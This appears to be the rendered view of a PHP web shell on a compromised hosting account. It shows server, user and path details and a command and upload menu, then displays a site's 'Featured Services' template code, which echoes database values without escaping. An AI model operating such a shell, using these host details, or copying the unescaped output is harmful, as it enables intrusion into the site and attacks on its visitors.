Server IP : 103.53.40.154 / Your IP : 3.138.126.124 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/pilingdrillingservices.com/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!-- Service Section --> <div class="section section-services section-pad"> <h1 style="color:services.phpED4B41" class="text-center ">Featured Services</h1> <div class="container"> <div class="content row"> <!-- Feature Row --> <div class="feature-row feature-service-row row"> <?php $sqlser = "SELECT * FROM `tb7_services_cat` LIMIT 6"; $runser = mysqli_query($db,$sqlser); while($dataser = mysqli_fetch_assoc($runser)){ ?> <div class="col-md-4 col-sm-6 "> <!-- feature box --> <div class="feature boxed"> <a href="<?php echo $wspath?>services<?php echo $dataser['slug_url']?>.html"> <div class="fbox-photo"> <img src="<?php echo $wspath?>image/<?php echo $dataser['cat_image']?>" alt="<?php echo $dataser['cat_name']?>" title="<?php echo $dataser['cat_name']?>"> </div> </a> <div class="fbox-content"> <h3><a href="<?php echo $wspath?>services<?php echo $dataser['slug_url']?>.html"><?php echo $dataser['cat_name']?></a></h3> <p><?php echo substr($dataser['cat_desc'],0,150)?>...</p> <p><a href="<?php echo $wspath?>contact.html" class="btn-link">Contact Us</a></p> </div> </div> <!-- End Feature box --> </div> <?php } ?> </div> <!-- Feture Row #end --> </div> </div> <ul> <li class="quote-btn text-center "><a class="btn" href="services.php">More services</a></li> </ul> </div> <!-- End Section -->